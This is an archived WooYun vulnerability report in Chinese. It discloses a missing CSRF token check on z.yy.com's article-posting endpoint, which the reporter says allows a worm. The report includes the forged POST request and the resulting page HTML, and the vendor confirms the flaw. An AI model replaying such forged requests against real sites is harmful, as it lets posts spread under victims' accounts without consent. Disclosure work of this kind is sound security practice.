乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-09-16: 细节已通知厂商并且等待厂商处理中 2013-09-18: 厂商已经确认,细节仅向厂商公开 2013-09-28: 细节向核心白帽子及相关领域专家公开 2013-10-08: 细节向普通白帽子公开 2013-10-18: 细节向实习白帽子公开 2013-10-31: 细节向公众公开
多玩YY空间某处未效验token,导致蠕虫.
postdata:
articleTitle=fuck!&articleContent=tester~
POST /feed/issueArticle.do HTTP/1.1Host: z.yy.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflate
body响应头:
<li jd="feedId:137932685164651385"> <div class="mod-cont mod-txt"> <div class="hd"> <div class="user-info"> <span class="user-name" jd="uid:811796690"><a href="myzone.do?puid=f4ab7173d7104d15deffaba475589280">y0umer</a></span> </div> <h3> fuck! </h3> </div> <div class="bd"> <div class="cont"> <p> testers~</p> </div> </div> <div class="ft"> <div class="feeds-attr"> <ul class="attr-opt"> <li class="last"><a href="#" jd="e:like,pun" title="喜欢"><i class="ico-like"></i><span>0</span></a></li> <li class="divider"></li> <li><a href="#" jd="e:forward,pun" title="转发"><i class="ico-send"></i><span>0</span></a></li> <li class="divider"></li> <li><a href="#" jd="e:comment,pun" title="评论"><i class="ico-comment"></i><span>0</span></a></li> </ul> <ul class="attr-info"> <li>2秒前</li> </ul> </div> </div> </div> <i class="ico-arr"></i> <i class="user-pic" jd="uid:811796690"><a href="myzone.do?puid=f4ab7173d7104d15deffaba475589280"><img src="../../../images/female_default_32.png" alt=""></a></i> <div class="ico-opt hide"> <ul class="feed-opt"> <li><a jd="e:delete" href="#">删除</a></li> </ul></div> </li>
经发现,z.yy.com全站没做csrf防御..
token..给个10rank不过分吧?
危害等级:中
漏洞Rank:10
确认时间:2013-09-18 11:30
感谢对于欢聚时代安全工作的支持,我们会尽快修复!
暂无